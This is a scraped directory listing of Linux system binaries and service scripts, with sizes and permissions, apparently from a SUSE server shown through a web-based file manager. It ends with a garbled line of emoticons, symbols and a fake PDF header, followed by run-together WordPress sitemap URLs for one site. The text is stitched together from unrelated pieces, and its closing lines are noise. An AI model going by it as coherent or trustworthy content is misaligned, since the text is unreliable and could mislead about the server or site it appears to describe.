rcfstrim File 5.28 KB 0755
rcgpm File 5.28 KB 0755
rchaveged File 5.28 KB 0755
rcipmievd File 5.28 KB 0755
rcirqbalance File 5.28 KB 0755
rciscsi File 5.28 KB 0755
rciscsid File 5.28 KB 0755
rciscsiuio File 5.28 KB 0755
rckdump File 5.28 KB 0755
rckexec-load File 5.28 KB 0755
rclogrotate File 5.28 KB 0755
rcmcelog File 5.28 KB 0755
rcmdmonitor File 5.28 KB 0755
rcmultipathd File 5.28 KB 0755
rcmysql File 11.9 KB 0755
rcnfs File 5.28 KB 0755
rcnfs-client File 5.28 KB 0755
rcnfs-server File 5.28 KB 0755
rcnfsserver File 5.28 KB 0755
rcnginx File 5.28 KB 0755
rcnscd File 5.28 KB 0755
rcntp-wait File 5.28 KB 0755
rcntpd File 5.28 KB 0755
rcopenct File 1.98 KB 0755
rcopenslp File 37 B 0755
rcpcscd File 5.28 KB 0755
rcpostfix File 5.28 KB 0755
rcraw File 5.28 KB 0755
rcrestorecond File 5.28 KB 0755
rcrng-tools File 5.28 KB 0755
rcrpcbind File 5.28 KB 0755
rcrpmconfigcheck File 2.47 KB 0755
rcrsyncd File 5.28 KB 0755
rcrsyslog File 5.28 KB 0755
rcsaslauthd File 5.28 KB 0755
rcslpd File 5.28 KB 0755
rcsmartd File 5.28 KB 0755
rcsnmpd File 5.29 KB 0755
rcsnmptrapd File 3.48 KB 0755
rcsshd File 5.28 KB 0755
rcvgauthd File 5.28 KB 0755
rcvmtoolsd File 5.28 KB 0755
rcvsftpd File 5.28 KB 0755
rcwicked File 5.28 KB 0755
rcwickedd File 5.28 KB 0755
rcwickedd-auto4 File 5.28 KB 0755
rcwickedd-dhcp4 File 5.28 KB 0755
rcwickedd-dhcp6 File 5.28 KB 0755
rcwickedd-nanny File 5.28 KB 0755
rcxinetd File 5.28 KB 0755
rcypbind File 5.28 KB 0755
rdma File 50.73 KB 0755
readprofile File 18.13 KB 0755
refresh_initrd File 1.08 KB 0755
regdbdump File 14.34 KB 0755
reject File 10.1 KB 0555
repquota File 80.14 KB 0755
resize2fs File 55.39 KB 0755
resizepart File 54.18 KB 0755
restorecond File 31.02 KB 0755
rfkill File 38.17 KB 0755
rmmod File 236.71 KB 0755
rndc File 34.95 KB 0755
rndc-confgen File 18.49 KB 0755
rngd File 23.56 KB 0755
rollback-reset-registration File 1.16 KB 0755
rootgrow File 1.48 KB 0755
routef File 173 B 0755
routel File 1.59 KB 0755
rpc.gssd File 83.79 KB 0755
rpc.idmapd File 35.22 KB 0755
rpc.mountd File 266.95 KB 0755
rpc.nfsd File 23.15 KB 0755
rpc.statd File 80.1 KB 0755
rpc.svcgssd File 35.1 KB 0755
rpcdebug File 14.45 KB 0755
rsyncd File 428.4 KB 0755
rsyslog-service-prepare File 755 B 0755
rsyslogd File 602.45 KB 0755
rtacct File 40.77 KB 0755
rtcwake File 42.17 KB 0755
rtmon File 50.81 KB 0755
rtpr File 37 B 0755
rtstat File 18.87 KB 0755
run_init File 10.42 KB 0755
runuser File 58.1 KB 0755
safe_finger File 10.38 KB 0755
saslauthd File 87.77 KB 0755
sasldblistusers2 File 18.43 KB 0755
saslpasswd2 File 14.52 KB 0755
save_y2logs File 3.25 KB 0755
schema2ldif File 1.15 KB 0755
sefcontext_compile File 58.99 KB 0755
selabel_digest File 10.38 KB 0755
selabel_lookup File 10.32 KB 0755
selabel_lookup_best_match File 10.34 KB 0755
selabel_partial_match File 10.27 KB 0755
selinux-ready File 6.24 KB 0755
selinux_restorecon File 14.38 KB 0755
selinuxconlist File 10.29 KB 0755
selinuxdefcon File 10.31 KB 0755
selinuxenabled File 6.21 KB 0755
selinuxexeccon File 6.29 KB 0755
semanage File 36.23 KB 0755
semodule File 23.37 KB 0755
sendmail File 27.01 KB 0755
service File 5.28 KB 0755
sestatus File 14.55 KB 0755
setDefaultJava File 572 B 0755
setSystemQuotas.pl File 3.84 KB 0755
setctsid File 10.33 KB 0755
setenforce File 6.26 KB 0755
setquota File 88.23 KB 0755
setquota-ldap.pl File 5.9 KB 0755
setsebool File 14.49 KB 0755
sfdisk File 122.17 KB 0755
sgdisk File 162.94 KB 0755
showmount File 18.84 KB 0755
slpd File 155.53 KB 0755
sm-notify File 51.26 KB 0755
smart_agetty File 2.03 KB 0755
smartctl File 709.05 KB 0755
smartd File 644.68 KB 0755
smtp-sink File 31.73 KB 0755
smtp-source File 22.75 KB 0755
snapperd File 212.05 KB 0755
snmpd File 31.02 KB 0755
snmptrapd File 31.09 KB 0755
sntp File 231.6 KB 0755
ss File 125.32 KB 0755
sshd File 869.2 KB 0755
sshd-gen-keys-start File 151 B 0755
start-ntpd File 5.46 KB 0755
start-statd File 535 B 0755
sulogin File 46.1 KB 0755
swaplabel File 14.09 KB 0755
swapoff File 18.09 KB 0755
swapon File 46.34 KB 0755
switch_root File 14.1 KB 0755
sysconf_addword File 2.64 KB 0755
sysctl File 22.56 KB 0755
systemd-sysv-convert File 4.7 KB 0755
tc File 403.02 KB 0755
tcpd File 10.27 KB 0755
tcpdchk File 22.63 KB 0755
tcpdmatch File 22.57 KB 0755
tcpdump File 836.82 KB 0755
testsaslauthd File 14.38 KB 0755
thin_check File 1.2 MB 0755
thin_delta File 1.2 MB 0755
thin_dump File 1.2 MB 0755
thin_ls File 1.2 MB 0755
thin_metadata_size File 1.2 MB 0755
thin_repair File 1.2 MB 0755
thin_restore File 1.2 MB 0755
thin_rmap File 1.2 MB 0755
thin_trim File 1.2 MB 0755
tickadj File 6.09 KB 0755
tipc File 54.59 KB 0755
togglesebool File 10.31 KB 0755
tracepath File 14.04 KB 0755
tracepath6 File 14.04 KB 0755
traceroute File 67.19 KB 0755
traceroute6 File 67.19 KB 0755
try-from File 10.23 KB 0755
tsig-keygen File 18.5 KB 0755
tune2fs File 99.89 KB 0755
tunelp File 26.1 KB 0755
umount.crypt File 34.98 KB 0755
umount.udisks2 File 10.35 KB 0755
update-alternatives File 42.66 KB 0755
update-ca-certificates File 1.59 KB 0755
update-leap File 11.73 KB 0755
update-smart-drivedb File 13.8 KB 0755
useradd File 119.58 KB 0755
useradd.local File 940 B 0755
userdel File 78.44 KB 0755
userdel-post.local File 575 B 0755
userdel-pre.local File 659 B 0755
userdel.local File 261 B 0744
usermod File 111.39 KB 0755
vconfig File 14.31 KB 0755
veritysetup File 44.45 KB 0755
vigr File 51.98 KB 0755
vipw File 51.98 KB 0755
visudo File 211.05 KB 0755
vmcore-dmesg File 18.38 KB 0755
vpddecode File 14.38 KB 0755
vsftpd File 156.36 KB 0755
warnquota File 92.23 KB 0755
wicked File 307.94 KB 0755
wickedd File 18.42 KB 0755
wickedd-nanny File 56.16 KB 0755
wipefs File 38.1 KB 0755
wiper.sh File 27.43 KB 0755
xconv.pl File 3.11 KB 0755
xfs_admin File 1.35 KB 0755
xfs_bmap File 638 B 0755
xfs_copy File 383.15 KB 0755
xfs_db File 629.09 KB 0755
xfs_estimate File 10.33 KB 0755
xfs_freeze File 767 B 0755
xfs_fsr File 30.76 KB 0755
xfs_growfs File 375.07 KB 0755
xfs_info File 472 B 0755
xfs_io File 152.15 KB 0755
xfs_logprint File 407.01 KB 0755
xfs_mdrestore File 363.03 KB 0755
xfs_metadump File 747 B 0755
xfs_mkfile File 1007 B 0755
xfs_ncheck File 650 B 0755
xfs_quota File 86.77 KB 0755
xfs_rtcp File 14.41 KB 0755
xfs_spaceman File 34.6 KB 0755
xinetd File 171.77 KB 0755
xqmstats File 14.42 KB 0755
xtables-multi File 85.81 KB 0755
yast File 12.4 KB 0755
yast2 File 12.4 KB 0755
ypbind File 51.31 KB 0755
yppoll File 14.52 KB 0755
ypset File 10.45 KB 0755
yptest File 18.59 KB 0755
zdump File 42.47 KB 0755
zendctl File 8.02 KB 0755
zic File 50.55 KB 0755
zramctl File 98.29 KB 0755
zypp-refresh File 34.27 KB 0755
zypper-log File 5.13 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml